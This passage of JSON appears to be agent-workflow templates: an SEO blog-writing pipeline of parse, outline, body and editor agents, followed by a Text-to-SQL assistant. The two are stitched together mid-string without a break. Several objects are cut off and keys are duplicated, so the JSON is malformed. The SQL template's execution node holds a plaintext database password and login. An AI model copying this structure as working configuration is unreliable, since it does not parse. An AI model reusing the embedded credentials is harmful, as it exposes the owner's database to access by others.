"prompts":[
{
"content":"The parse and keyword agent output is {Agent:ClearRabbitsScream@content}\n\n\n\nThe Outline agent output is {Agent:BetterSitesSend@content}",
"role":"user"
}
],
"sys_prompt":"# Role\n\nYou are the **Body_Agent**, responsible for generating the full content of each section of an SEO-optimized blog based on the provided outline and keyword strategy.\n\n# Tool Access:\n\nYou can use the `Tavily Search` tool to retrieve relevant content, statistics, or examples to support each section you're writing.\n\nUse it **only** when the provided outline lacks enough information, or if the section requires factual grounding.\n\nAlways cite the original link or indicate source where possible.\n\n\n# Goals\n\n1. Write each section (based on H2/H3 structure) as a complete and natural blog paragraph.\n\n2. Integrate the suggested long-tail keywords naturally into each section.\n\n3. When appropriate, use the `Tavily Search` tool to enrich your writing with relevant facts, examples, or quotes.\n\n4. Ensure each section is clear, engaging, and informative, suitable for both human readers and search engines.\n\n\n# Style Guidelines\n\n- Write in a tone appropriate to the audience. Be explanatory, not promotional, unless it's a marketing blog.\n\n- Avoid generic filler content. Prioritize clarity, structure, and value.\n\n- Ensure SEO keywords are embedded seamlessly, not forcefully.\n\n\n\n- Maintain writing rhythm. Vary sentence lengths. Use transitions between ideas.\n\n\n# Input\n\n\nYou will receive:\n\n- Blog title\n\n- Structured outline (including section titles, keywords, and descriptions)\n\n- Target audience\n\n- Blog type and user intent\n\nYou must **follow the outline strictly**. Write content **section-by-section**, based on the structure.\n\n\n# Output Format\n\n```markdown\n\n## H2: [Section Title]\n\n[Your generated content for this section \u2014 500-600 words, using keywords naturally.]\n\n",
"temperature":0.2,
"temperatureEnabled":true,
"tools":[
{
"component_name":"TavilySearch",
"name":"TavilySearch",
"params":{
"api_key":"",
"days":7,
"exclude_domains":[],
"include_answer":false,
"include_domains":[],
"include_image_descriptions":false,
"include_images":false,
"include_raw_content":true,
"max_results":5,
"outputs":{
"formalized_content":{
"type":"string",
"value":""
},
"json":{
"type":"Array<Object>",
"value":[]
}
},
"query":"sys.query",
"search_depth":"basic",
"topic":"general"
}
}
],
"topPEnabled":false,
"top_p":0.75,
"user_prompt":"",
"visual_files_var":""
}
},
"upstream":[
"Agent:BetterSitesSend"
]
},
"Agent:LovelyHeadsOwn":{
"downstream":[
"Message:LegalBeansBet"
],
"obj":{
"component_name":"Agent",
"params":{
"delay_after_error":1,
"description":"",
"exception_comment":"",
"exception_default_value":"",
"exception_goto":[],
"exception_method":null,
"frequencyPenaltyEnabled":false,
"frequency_penalty":0.5,
"llm_id":"deepseek-chat@DeepSeek",
"maxTokensEnabled":false,
"max_retries":3,
"max_rounds":5,
"max_tokens":4096,
"mcp":[],
"message_history_window_size":12,
"outputs":{
"content":{
"type":"string",
"value":""
}
},
"parameter":"Precise",
"presencePenaltyEnabled":false,
"presence_penalty":0.5,
"prompts":[
{
"content":"The parse and keyword agent output is {Agent:ClearRabbitsScream@content}\n\nThe Outline agent output is {Agent:BetterSitesSend@content}\n\nThe Body agent output is {Agent:EagerNailsRemain@content}",
"role":"user"
}
],
"sys_prompt":"# Role\n\nYou are the **Editor_Agent**, responsible for finalizing the blog post for both human readability and SEO effectiveness.\n\n# Goals\n\n1. Polish the entire blog content for clarity, coherence, and style.\n\n2. Improve transitions between sections, ensure logical flow.\n\n3. Verify that keywords are used appropriately and effectively.\n\n4. Conduct a lightweight SEO audit \u2014 checking keyword density, structure (H1/H2/H3), and overall searchability.\n\n\n\n# Style Guidelines\n\n- Be precise. Avoid bloated or vague language.\n\n- Maintain an informative and engaging tone, suitable to the target audience.\n\n- Do not remove keywords unless absolutely necessary for clarity.\n\n- Ensure paragraph flow and section continuity.\n\n\n# Input\n\nYou will receive:\n\n- Full blog content, written section-by-section\n\n- Original outline with suggested keywords\n\n- Target audience and writing type\n\n# Output Format\n\n```markdown\n\n[The revised, fully polished blog post content goes here.]\n\n",
"temperature":0.2,
"temperatureEnabled":true,
"tools":[],
"topPEnabled":false,
"top_p":0.75,
"user_prompt":"",
"visual_files_var":""
}
},
"upstream":[
"Agent:EagerNailsRemain"
]
},
"Message:LegalBeansBet":{
"downstream":[],
"obj":{
"component_name":"Message",
"params":{
"content":[
"{Agent:LovelyHeadsOwn@content}"
]
}
},
"upstream":[
"Agent:LovelyHeadsOwn"
]
},
"begin":{
"downstream":[
"Agent:ClearRabbitsScream"
],
"obj":{
"component_name":"Begin",
"params":{
"enablePrologue":true,
"inputs":{},
"mode":"conversational",
"prologue":"Hi! I'm your SEO blog assistant.\n\nTo get started, please tell me:\n1. What topic you want the blog to cover\n2. Who is the target audience\n3. What you hope to achieve with this blog (e.g., SEO traffic, teaching beginners, promoting a product)\n"
"prologue":"Hi! I'm your SEO blog assistant.\n\nTo get started, please tell me:\n1. What topic you want the blog to cover\n2. Who is the target audience\n3. What you hope to achieve with this blog (e.g., SEO traffic, teaching beginners, promoting a product)\n"
},
"label":"Begin",
"name":"begin"
},
"id":"begin",
"measured":{
"height":48,
"width":200
},
"position":{
"x":50,
"y":200
},
"selected":false,
"sourcePosition":"left",
"targetPosition":"right",
"type":"beginNode"
},
{
"data":{
"form":{
"delay_after_error":1,
"description":"",
"exception_comment":"",
"exception_default_value":"",
"exception_goto":[],
"exception_method":null,
"frequencyPenaltyEnabled":false,
"frequency_penalty":0.5,
"llm_id":"deepseek-chat@DeepSeek",
"maxTokensEnabled":false,
"max_retries":3,
"max_rounds":1,
"max_tokens":4096,
"mcp":[],
"message_history_window_size":12,
"outputs":{
"content":{
"type":"string",
"value":""
}
},
"parameter":"Precise",
"presencePenaltyEnabled":false,
"presence_penalty":0.5,
"prompts":[
{
"content":"The user query is {sys.query}",
"role":"user"
}
],
"sys_prompt":"# Role\n\nYou are the **Parse_And_Keyword_Agent**, responsible for interpreting a user's blog writing request and generating a structured writing intent summary and keyword strategy for SEO-optimized content generation.\n\n# Goals\n\n1. Extract and infer the user's true writing intent, even if the input is informal or vague.\n\n2. Identify the writing type, target audience, and implied goal.\n\n3. Suggest 3\u20135 long-tail keywords based on the input and context.\n\n4. Output all data in a Markdown format for downstream agents.\n\n# Operating Guidelines\n\n\n- If the user's input lacks clarity, make reasonable and **conservative** assumptions based on SEO best practices.\n\n- Always choose one clear \"Writing Type\" from the list below.\n\n- Your job is not to write the blog \u2014 only to structure the brief.\n\n# Output Format\n\n```markdown\n## Writing Type\n\n[Choose one: Tutorial / Informative Guide / Marketing Content / Case Study / Opinion Piece / How-to / Comparison Article]\n\n## Target Audience\n\n[Try to be specific based on clues in the input: e.g., marketing managers, junior developers, SEO beginners]\n\n## User Intent Summary\n\n[A 1\u20132 sentence summary of what the user wants to achieve with the blog post]\n\n## Suggested Long-tail Keywords\n\n- keyword 1\n\n- keyword 2\n\n- keyword 3\n\n- keyword 4 (optional)\n\n- keyword 5 (optional)\n\n\n\n\n## Input Examples (and how to handle them)\n\nInput: \"I want to write about RAGFlow.\"\n\u2192 Output: Informative Guide, Audience: AI developers, Intent: explain what RAGFlow is and its use cases\n\nInput: \"Need a blog to promote our prompt design tool.\"\n\u2192 Output: Marketing Content, Audience: product managers or tool adopters, Intent: raise awareness and interest in the product\n\n\n\nInput: \"How to get more Google traffic using AI\"\n\u2192 Output: How-to, Audience: SEO marketers, Intent: guide readers on applying AI for SEO growth",
"temperature":0.2,
"temperatureEnabled":true,
"tools":[],
"topPEnabled":false,
"top_p":0.75,
"user_prompt":"",
"visual_files_var":""
},
"label":"Agent",
"name":"Parse And Keyword Agent"
},
"dragging":false,
"id":"Agent:ClearRabbitsScream",
"measured":{
"height":84,
"width":200
},
"position":{
"x":344.7766966202233,
"y":234.82202253184496
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"agentNode"
},
{
"data":{
"form":{
"delay_after_error":1,
"description":"",
"exception_comment":"",
"exception_default_value":"",
"exception_goto":[],
"exception_method":null,
"frequencyPenaltyEnabled":false,
"frequency_penalty":0.3,
"llm_id":"deepseek-chat@DeepSeek",
"maxTokensEnabled":false,
"max_retries":3,
"max_rounds":3,
"max_tokens":4096,
"mcp":[],
"message_history_window_size":12,
"outputs":{
"content":{
"type":"string",
"value":""
}
},
"parameter":"Balance",
"presencePenaltyEnabled":false,
"presence_penalty":0.2,
"prompts":[
{
"content":"The parse and keyword agent output is {Agent:ClearRabbitsScream@content}",
"role":"user"
}
],
"sys_prompt":"# Role\n\nYou are the **Outline_Agent**, responsible for generating a clear and SEO-optimized blog outline based on the user's parsed writing intent and keyword strategy.\n\n# Tool Access:\n\n- You have access to a search tool called `Tavily Search`.\n\n- If you are unsure how to structure a section, you may call this tool to search for related blog outlines or content from Google.\n\n- Do not overuse it. Your job is to extract **structure**, not to write paragraphs.\n\n\n# Goals\n\n1. Create a well-structured outline with appropriate H2 and H3 headings.\n\n2. Ensure logical flow from introduction to conclusion.\n\n3. Assign 1\u20132 suggested long-tail keywords to each major section for SEO alignment.\n\n4. Make the structure suitable for downstream paragraph writing.\n\n\n\n\n#Note\n\n- Use concise, scannable section titles.\n\n- Do not write full paragraphs.\n\n- Prioritize clarity, logical progression, and SEO alignment.\n\n\n\n- If the blog type is \u201cTutorial\u201d or \u201cHow-to\u201d, include step-based sections.\n\n\n# Input\n\nYou will receive:\n\n- Writing Type (e.g., Tutorial, Informative Guide)\n\n- Target Audience\n\n- User Intent Summary\n\n- 3\u20135 long-tail keywords\n\n\nUse this information to design a structure that both informs readers and maximizes search engine visibility.\n\n# Output Format\n\n```markdown\n\n## Blog Title (suggested)\n\n[Give a short, SEO-friendly title suggestion]\n\n## Outline\n\n### Introduction\n\n- Purpose of the article\n\n- Brief context\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 1]\n\n- [Short description of what this section will cover]\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 2]\n\n- [Short description of what this section will cover]\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 3]\n\n- [Optional H3 Subsection Title A]\n\n - [Explanation of sub-point]\n\n- [Optional H3 Subsection Title B]\n\n - [Explanation of sub-point]\n\n- **Suggested keywords**: [keyword1]\n\n### Conclusion\n\n- Recap key takeaways\n\n- Optional CTA (Call to Action)\n\n- **Suggested keywords**: [keyword3]\n\n",
"temperature":0.5,
"temperatureEnabled":true,
"tools":[
{
"component_name":"TavilySearch",
"name":"TavilySearch",
"params":{
"api_key":"",
"days":7,
"exclude_domains":[],
"include_answer":false,
"include_domains":[],
"include_image_descriptions":false,
"include_images":false,
"include_raw_content":true,
"max_results":5,
"outputs":{
"formalized_content":{
"type":"string",
"value":""
},
"json":{
"type":"Array<Object>",
"value":[]
}
},
"query":"sys.query",
"search_depth":"basic",
"topic":"general"
}
}
],
"topPEnabled":false,
"top_p":0.85,
"user_prompt":"",
"visual_files_var":""
},
"label":"Agent",
"name":"Outline Agent"
},
"dragging":false,
"id":"Agent:BetterSitesSend",
"measured":{
"height":84,
"width":200
},
"position":{
"x":613.4368763415628,
"y":164.3074269048589
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"agentNode"
},
{
"data":{
"form":{
"description":"This is an agent for a specific task.",
"user_prompt":"This is the order you need to send to the agent."
},
"label":"Tool",
"name":"flow.tool_0"
},
"dragging":false,
"id":"Tool:SharpPensBurn",
"measured":{
"height":44,
"width":200
},
"position":{
"x":580.1877078861457,
"y":287.7669662022325
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"toolNode"
},
{
"data":{
"form":{
"delay_after_error":1,
"description":"",
"exception_comment":"",
"exception_default_value":"",
"exception_goto":[],
"exception_method":null,
"frequencyPenaltyEnabled":false,
"frequency_penalty":0.5,
"llm_id":"deepseek-chat@DeepSeek",
"maxTokensEnabled":false,
"max_retries":3,
"max_rounds":5,
"max_tokens":4096,
"mcp":[],
"message_history_window_size":12,
"outputs":{
"content":{
"type":"string",
"value":""
}
},
"parameter":"Precise",
"presencePenaltyEnabled":false,
"presence_penalty":0.5,
"prompts":[
{
"content":"The parse and keyword agent output is {Agent:ClearRabbitsScream@content}\n\n\n\nThe Outline agent output is {Agent:BetterSitesSend@content}",
"role":"user"
}
],
"sys_prompt":"# Role\n\nYou are the **Body_Agent**, responsible for generating the full content of each section of an SEO-optimized blog based on the provided outline and keyword strategy.\n\n# Tool Access:\n\nYou can use the `Tavily Search` tool to retrieve relevant content, statistics, or examples to support each section you're writing.\n\nUse it **only** when the provided outline lacks enough information, or if the section requires factual grounding.\n\nAlways cite the original link or indicate source where possible.\n\n\n# Goals\n\n1. Write each section (based on H2/H3 structure) as a complete and natural blog paragraph.\n\n2. Integrate the suggested long-tail keywords naturally into each section.\n\n3. When appropriate, use the `Tavily Search` tool to enrich your writing with relevant facts, examples, or quotes.\n\n4. Ensure each section is clear, engaging, and informative, suitable for both human readers and search engines.\n\n\n# Style Guidelines\n\n- Write in a tone appropriate to the audience. Be explanatory, not promotional, unless it's a marketing blog.\n\n- Avoid generic filler content. Prioritize clarity, structure, and value.\n\n- Ensure SEO keywords are embedded seamlessly, not forcefully.\n\n\n\n- Maintain writing rhythm. Vary sentence lengths. Use transitions between ideas.\n\n\n# Input\n\n\nYou will receive:\n\n- Blog title\n\n- Structured outline (including section titles, keywords, and descriptions)\n\n- Target audience\n\n- Blog type and user intent\n\nYou must **follow the outline strictly**. Write content **section-by-section**, based on the structure.\n\n\n# Output Format\n\n```markdown\n\n## H2: [Section Title]\n\n[Your generated content for this section \u2014 500-600 words, using keywords naturally.]\n\n",
"temperature":0.2,
"temperatureEnabled":true,
"tools":[
{
"component_name":"TavilySearch",
"name":"TavilySearch",
"params":{
"api_key":"",
"days":7,
"exclude_domains":[],
"include_answer":false,
"include_domains":[],
"include_image_descriptions":false,
"include_images":false,
"include_raw_content":true,
"max_results":5,
"outputs":{
"formalized_content":{
"type":"string",
"value":""
},
"json":{
"type":"Array<Object>",
"value":[]
}
},
"query":"sys.query",
"search_depth":"basic",
"topic":"general"
}
}
],
"topPEnabled":false,
"top_p":0.75,
"user_prompt":"",
"visual_files_var":""
},
"label":"Agent",
"name":"Body Agent"
},
"dragging":false,
"id":"Agent:EagerNailsRemain",
"measured":{
"height":84,
"width":200
},
"position":{
"x":889.0614605692713,
"y":247.00973041799065
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"agentNode"
},
{
"data":{
"form":{
"description":"This is an agent for a specific task.",
"user_prompt":"This is the order you need to send to the agent."
},
"label":"Tool",
"name":"flow.tool_1"
},
"dragging":false,
"id":"Tool:WickedDeerHeal",
"measured":{
"height":44,
"width":200
},
"position":{
"x":853.2006404239659,
"y":364.37541577229143
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"toolNode"
},
{
"data":{
"form":{
"delay_after_error":1,
"description":"",
"exception_comment":"",
"exception_default_value":"",
"exception_goto":[],
"exception_method":null,
"frequencyPenaltyEnabled":false,
"frequency_penalty":0.5,
"llm_id":"deepseek-chat@DeepSeek",
"maxTokensEnabled":false,
"max_retries":3,
"max_rounds":5,
"max_tokens":4096,
"mcp":[],
"message_history_window_size":12,
"outputs":{
"content":{
"type":"string",
"value":""
}
},
"parameter":"Precise",
"presencePenaltyEnabled":false,
"presence_penalty":0.5,
"prompts":[
{
"content":"The parse and keyword agent output is {Agent:ClearRabbitsScream@content}\n\nThe Outline agent output is {Agent:BetterSitesSend@content}\n\nThe Body agent output is {Agent:EagerNailsRemain@content}",
"role":"user"
}
],
"sys_prompt":"# Role\n\nYou are the **Editor_Agent**, responsible for finalizing the blog post for both human readability and SEO effectiveness.\n\n# Goals\n\n1. Polish the entire blog content for clarity, coherence, and style.\n\n2. Improve transitions between sections, ensure logical flow.\n\n3. Verify that keywords are used appropriately and effectively.\n\n4. Conduct a lightweight SEO audit \u2014 checking keyword density, structure (H1/H2/H3), and overall searchability.\n\n\n\n# Style Guidelines\n\n- Be precise. Avoid bloated or vague language.\n\n- Maintain an informative and engaging tone, suitable to the target audience.\n\n- Do not remove keywords unless absolutely necessary for clarity.\n\n- Ensure paragraph flow and section continuity.\n\n\n# Input\n\nYou will receive:\n\n- Full blog content, written section-by-section\n\n- Original outline with suggested keywords\n\n- Target audience and writing type\n\n# Output Format\n\n```markdown\n\n[The revised, fully polished blog post content goes here.]\n\n",
"temperature":0.2,
"temperatureEnabled":true,
"tools":[],
"topPEnabled":false,
"top_p":0.75,
"user_prompt":"",
"visual_files_var":""
},
"label":"Agent",
"name":"Editor Agent"
},
"dragging":false,
"id":"Agent:LovelyHeadsOwn",
"measured":{
"height":84,
"width":200
},
"position":{
"x":1160.3332919804993,
"y":149.50806732882472
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"agentNode"
},
{
"data":{
"form":{
"content":[
"{Agent:LovelyHeadsOwn@content}"
]
},
"label":"Message",
"name":"Response"
},
"dragging":false,
"id":"Message:LegalBeansBet",
"measured":{
"height":56,
"width":200
},
"position":{
"x":1370.6665839609984,
"y":267.0323933738015
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"messageNode"
},
{
"data":{
"form":{
"text":"This workflow automatically generates a complete SEO-optimized blog article based on a simple user input. You don\u2019t need any writing experience. Just provide a topic or short request \u2014 the system will handle the rest.\n\nThe process includes the following key stages:\n\n1. **Understanding your topic and goals**\n2. **Designing the blog structure**\n3. **Writing high-quality content**\n\n\n"
},
"label":"Note",
"name":"Workflow Overall Description"
},
"dragHandle":".note-drag-handle",
"dragging":false,
"height":205,
"id":"Note:SlimyGhostsWear",
"measured":{
"height":205,
"width":415
},
"position":{
"x":-284.3143151688742,
"y":150.47632147913419
},
"resizing":false,
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"noteNode",
"width":415
},
{
"data":{
"form":{
"text":"**Purpose**: \nThis agent reads the user\u2019s input and figures out what kind of blog needs to be written.\n\n**What it does**:\n- Understands the main topic you want to write about \n- Identifies who the blog is for (e.g., beginners, marketers, developers) \n- Determines the writing purpose (e.g., SEO traffic, product promotion, education) \n- Suggests 3\u20135 long-tail SEO keywords related to the topic"
},
"label":"Note",
"name":"Parse And Keyword Agent"
},
"dragHandle":".note-drag-handle",
"dragging":false,
"height":152,
"id":"Note:EmptyChairsShake",
"measured":{
"height":152,
"width":340
},
"position":{
"x":295.04147626768133,
"y":372.2755718118446
},
"resizing":false,
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"noteNode",
"width":340
},
{
"data":{
"form":{
"text":"**Purpose**: \nThis agent builds the blog structure \u2014 just like writing a table of contents before you start writing the full article.\n\n**What it does**:\n- Suggests a clear blog title that includes important keywords \n- Breaks the article into sections using H2 and H3 headings (like a professional blog layout) \n- Assigns 1\u20132 recommended keywords to each section to help with SEO \n- Follows the writing goal and target audience set in the previous step"
},
"label":"Note",
"name":"Outline Agent"
},
"dragHandle":".note-drag-handle",
"dragging":false,
"height":146,
"id":"Note:TallMelonsNotice",
"measured":{
"height":146,
"width":343
},
"position":{
"x":598.5644991893463,
"y":5.801054564756448
},
"resizing":false,
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"noteNode",
"width":343
},
{
"data":{
"form":{
"text":"**Purpose**: \nThis agent is responsible for writing the actual content of the blog \u2014 paragraph by paragraph \u2014 based on the outline created earlier.\n\n**What it does**:\n- Looks at each H2/H3 section in the outline \n- Writes 150\u2013220 words of clear, helpful, and well-structured content per section \n- Includes the suggested SEO keywords naturally (not keyword stuffing) \n- Uses real examples or facts if needed (by calling a web search tool like Tavily)"
},
"label":"Note",
"name":"Body Agent"
},
"dragHandle":".note-drag-handle",
"dragging":false,
"height":137,
"id":"Note:RipeCougarsBuild",
"measured":{
"height":137,
"width":319
},
"position":{
"x":860.4854129814981,
"y":427.2196835690842
},
"resizing":false,
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"noteNode",
"width":319
},
{
"data":{
"form":{
"text":"**Purpose**: \nThis agent reviews the entire blog draft to make sure it is smooth, professional, and SEO-friendly. It acts like a human editor before publishing.\n\n**What it does**:\n- Polishes the writing: improves sentence clarity, fixes awkward phrasing \n- Makes sure the content flows well from one section to the next \n- Double-checks keyword usage: are they present, natural, and not overused? \n- Verifies the blog structure (H1, H2, H3 headings) is correct \n- Adds two key SEO elements:\n - **Meta Title** (shows up in search results)\n - **Meta Description** (summary for Google and social sharing)"
"description":"SQL Assistant is an AI-powered tool that lets business users turn plain-English questions into fully formed SQL queries. Simply type your question (e.g., “Show me last quarter’s top 10 products by revenue”) and SQL Assistant generates the exact SQL, runs it against your database, and returns the results in seconds. ",
"canvas_type":"Marketing",
"dsl":{
"components":{
"Agent:WickedGoatsDivide":{
"downstream":[
"ExeSQL:TiredShirtsPull"
],
"obj":{
"component_name":"Agent",
"params":{
"delay_after_error":1,
"description":"",
"exception_default_value":"",
"exception_goto":[],
"exception_method":"",
"frequencyPenaltyEnabled":false,
"frequency_penalty":0.7,
"llm_id":"qwen-max@Tongyi-Qianwen",
"maxTokensEnabled":false,
"max_retries":3,
"max_rounds":5,
"max_tokens":256,
"mcp":[],
"message_history_window_size":12,
"outputs":{
"content":{
"type":"string",
"value":""
}
},
"presencePenaltyEnabled":false,
"presence_penalty":0.4,
"prompts":[
{
"content":"User's query: {sys.query}\n\nSchema: {Retrieval:HappyTiesFilm@formalized_content}\n\nSamples about question to SQL: {Retrieval:SmartNewsHammer@formalized_content}\n\nDescription about meanings of tables and files: {Retrieval:SweetDancersAppear@formalized_content}",
"role":"user"
}
],
"sys_prompt":"### ROLE\nYou are a Text-to-SQL assistant. \nGiven a relational database schema and a natural-language request, you must produce a **single, syntactically-correct MySQL query** that answers the request. \nReturn **nothing except the SQL statement itself**\u2014no code fences, no commentary, no explanations, no comments, no trailing semicolon if not required.\n\n\n### EXAMPLES \n-- Example 1 \nUser: List every product name and its unit price. \nSQL:\nSELECT name, unit_price FROM Products;\n\n-- Example 2 \nUser: Show the names and emails of customers who placed orders in January 2025. \nSQL:\nSELECT DISTINCT c.name, c.email\nFROM Customers c\nJOIN Orders o ON o.customer_id = c.id\nWHERE o.order_date BETWEEN '2025-01-01' AND '2025-01-31';\n\n-- Example 3 \nUser: How many orders have a status of \"Completed\" for each month in 2024? \nSQL:\nSELECT DATE_FORMAT(order_date, '%Y-%m') AS month,\n COUNT(*) AS completed_orders\nFROM Orders\nWHERE status = 'Completed'\n AND YEAR(order_date) = 2024\nGROUP BY month\nORDER BY month;\n\n-- Example 4 \nUser: Which products generated at least \\$10 000 in total revenue? \nSQL:\nSELECT p.id, p.name, SUM(oi.quantity * oi.unit_price) AS revenue\nFROM Products p\nJOIN OrderItems oi ON oi.product_id = p.id\nGROUP BY p.id, p.name\nHAVING revenue >= 10000\nORDER BY revenue DESC;\n\n\n### OUTPUT GUIDELINES\n1. Think through the schema and the request. \n2. Write **only** the final MySQL query. \n3. Do **not** wrap the query in back-ticks or markdown fences. \n4. Do **not** add explanations, comments, or additional text\u2014just the SQL.",
"temperature":0.1,
"temperatureEnabled":false,
"tools":[],
"topPEnabled":false,
"top_p":0.3,
"user_prompt":"",
"visual_files_var":""
}
},
"upstream":[
"Retrieval:HappyTiesFilm",
"Retrieval:SmartNewsHammer",
"Retrieval:SweetDancersAppear"
]
},
"ExeSQL:TiredShirtsPull":{
"downstream":[
"Message:ShaggyMasksAttend"
],
"obj":{
"component_name":"ExeSQL",
"params":{
"database":"",
"db_type":"mysql",
"host":"",
"max_records":1024,
"outputs":{
"formalized_content":{
"type":"string",
"value":""
},
"json":{
"type":"Array<Object>",
"value":[]
}
},
"password":"20010812Yy!",
"port":3306,
"sql":"Agent:WickedGoatsDivide@content",
"username":"13637682833@163.com"
}
},
"upstream":[
"Agent:WickedGoatsDivide"
]
},
"Message:ShaggyMasksAttend":{
"downstream":[],
"obj":{
"component_name":"Message",
"params":{
"content":[
"{ExeSQL:TiredShirtsPull@formalized_content}"
]
}
},
"upstream":[
"ExeSQL:TiredShirtsPull"
]
},
"Retrieval:HappyTiesFilm":{
"downstream":[
"Agent:WickedGoatsDivide"
],
"obj":{
"component_name":"Retrieval",
"params":{
"cross_languages":[],
"empty_response":"",
"kb_ids":[
"ed31364c727211f0bdb2bafe6e7908e6"
],
"keywords_similarity_weight":0.7,
"outputs":{
"formalized_content":{
"type":"string",
"value":""
}
},
"query":"sys.query",
"rerank_id":"",
"similarity_threshold":0.2,
"top_k":1024,
"top_n":8,
"use_kg":false
}
},
"upstream":[
"begin"
]
},
"Retrieval:SmartNewsHammer":{
"downstream":[
"Agent:WickedGoatsDivide"
],
"obj":{
"component_name":"Retrieval",
"params":{
"cross_languages":[],
"empty_response":"",
"kb_ids":[
"0f968106727311f08357bafe6e7908e6"
],
"keywords_similarity_weight":0.7,
"outputs":{
"formalized_content":{
"type":"string",
"value":""
}
},
"query":"sys.query",
"rerank_id":"",
"similarity_threshold":0.2,
"top_k":1024,
"top_n":8,
"use_kg":false
}
},
"upstream":[
"begin"
]
},
"Retrieval:SweetDancersAppear":{
"downstream":[
"Agent:WickedGoatsDivide"
],
"obj":{
"component_name":"Retrieval",
"params":{
"cross_languages":[],
"empty_response":"",
"kb_ids":[
"4ad1f9d0727311f0827dbafe6e7908e6"
],
"keywords_similarity_weight":0.7,
"outputs":{
"formalized_content":{
"type":"string",
"value":""
}
},
"query":"sys.query",
"rerank_id":"",
"similarity_threshold":0.2,
"top_k":1024,
"top_n":8,
"use_kg":false
}
},
"upstream":[
"begin"
]
},
"begin":{
"downstream":[
"Retrieval:HappyTiesFilm",
"Retrieval:SmartNewsHammer",
"Retrieval:SweetDancersAppear"
],
"obj":{
"component_name":"Begin",
"params":{
"enablePrologue":true,
"inputs":{},
"mode":"conversational",
"prologue":"Hi! I'm your SQL assistant. What can I do for you?"
"prologue":"Hi! I'm your SQL assistant. What can I do for you?"
},
"label":"Begin",
"name":"begin"
},
"id":"begin",
"measured":{
"height":48,
"width":200
},
"position":{
"x":50,
"y":200
},
"selected":false,
"sourcePosition":"left",
"targetPosition":"right",
"type":"beginNode"
},
{
"data":{
"form":{
"cross_languages":[],
"empty_response":"",
"kb_ids":[
"ed31364c727211f0bdb2bafe6e7908e6"
],
"keywords_similarity_weight":0.7,
"outputs":{
"formalized_content":{
"type":"string",
"value":""
}
},
"query":"sys.query",
"rerank_id":"",
"similarity_threshold":0.2,
"top_k":1024,
"top_n":8,
"use_kg":false
},
"label":"Retrieval",
"name":"Schema"
},
"dragging":false,
"id":"Retrieval:HappyTiesFilm",
"measured":{
"height":96,
"width":200
},
"position":{
"x":414,
"y":20.5
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"retrievalNode"
},
{
"data":{
"form":{
"cross_languages":[],
"empty_response":"",
"kb_ids":[
"0f968106727311f08357bafe6e7908e6"
],
"keywords_similarity_weight":0.7,
"outputs":{
"formalized_content":{
"type":"string",
"value":""
}
},
"query":"sys.query",
"rerank_id":"",
"similarity_threshold":0.2,
"top_k":1024,
"top_n":8,
"use_kg":false
},
"label":"Retrieval",
"name":"Question to SQL"
},
"dragging":false,
"id":"Retrieval:SmartNewsHammer",
"measured":{
"height":96,
"width":200
},
"position":{
"x":406.5,
"y":175.5
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"retrievalNode"
},
{
"data":{
"form":{
"cross_languages":[],
"empty_response":"",
"kb_ids":[
"4ad1f9d0727311f0827dbafe6e7908e6"
],
"keywords_similarity_weight":0.7,
"outputs":{
"formalized_content":{
"type":"string",
"value":""
}
},
"query":"sys.query",
"rerank_id":"",
"similarity_threshold":0.2,
"top_k":1024,
"top_n":8,
"use_kg":false
},
"label":"Retrieval",
"name":"Database Description"
},
"dragging":false,
"id":"Retrieval:SweetDancersAppear",
"measured":{
"height":96,
"width":200
},
"position":{
"x":403.5,
"y":328
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"retrievalNode"
},
{
"data":{
"form":{
"delay_after_error":1,
"description":"",
"exception_default_value":"",
"exception_goto":[],
"exception_method":"",
"frequencyPenaltyEnabled":false,
"frequency_penalty":0.7,
"llm_id":"qwen-max@Tongyi-Qianwen",
"maxTokensEnabled":false,
"max_retries":3,
"max_rounds":5,
"max_tokens":256,
"mcp":[],
"message_history_window_size":12,
"outputs":{
"content":{
"type":"string",
"value":""
}
},
"presencePenaltyEnabled":false,
"presence_penalty":0.4,
"prompts":[
{
"content":"User's query: {sys.query}\n\nSchema: {Retrieval:HappyTiesFilm@formalized_content}\n\nSamples about question to SQL: {Retrieval:SmartNewsHammer@formalized_content}\n\nDescription about meanings of tables and files: {Retrieval:SweetDancersAppear@formalized_content}",
"role":"user"
}
],
"sys_prompt":"### ROLE\nYou are a Text-to-SQL assistant. \nGiven a relational database schema and a natural-language request, you must produce a **single, syntactically-correct MySQL query** that answers the request. \nReturn **nothing except the SQL statement itself**\u2014no code fences, no commentary, no explanations, no comments, no trailing semicolon if not required.\n\n\n### EXAMPLES \n-- Example 1 \nUser: List every product name and its unit price. \nSQL:\nSELECT name, unit_price FROM Products;\n\n-- Example 2 \nUser: Show the names and emails of customers who placed orders in January 2025. \nSQL:\nSELECT DISTINCT c.name, c.email\nFROM Customers c\nJOIN Orders o ON o.customer_id = c.id\nWHERE o.order_date BETWEEN '2025-01-01' AND '2025-01-31';\n\n-- Example 3 \nUser: How many orders have a status of \"Completed\" for each month in 2024? \nSQL:\nSELECT DATE_FORMAT(order_date, '%Y-%m') AS month,\n COUNT(*) AS completed_orders\nFROM Orders\nWHERE status = 'Completed'\n AND YEAR(order_date) = 2024\nGROUP BY month\nORDER BY month;\n\n-- Example 4 \nUser: Which products generated at least \\$10 000 in total revenue? \nSQL:\nSELECT p.id, p.name, SUM(oi.quantity * oi.unit_price) AS revenue\nFROM Products p\nJOIN OrderItems oi ON oi.product_id = p.id\nGROUP BY p.id, p.name\nHAVING revenue >= 10000\nORDER BY revenue 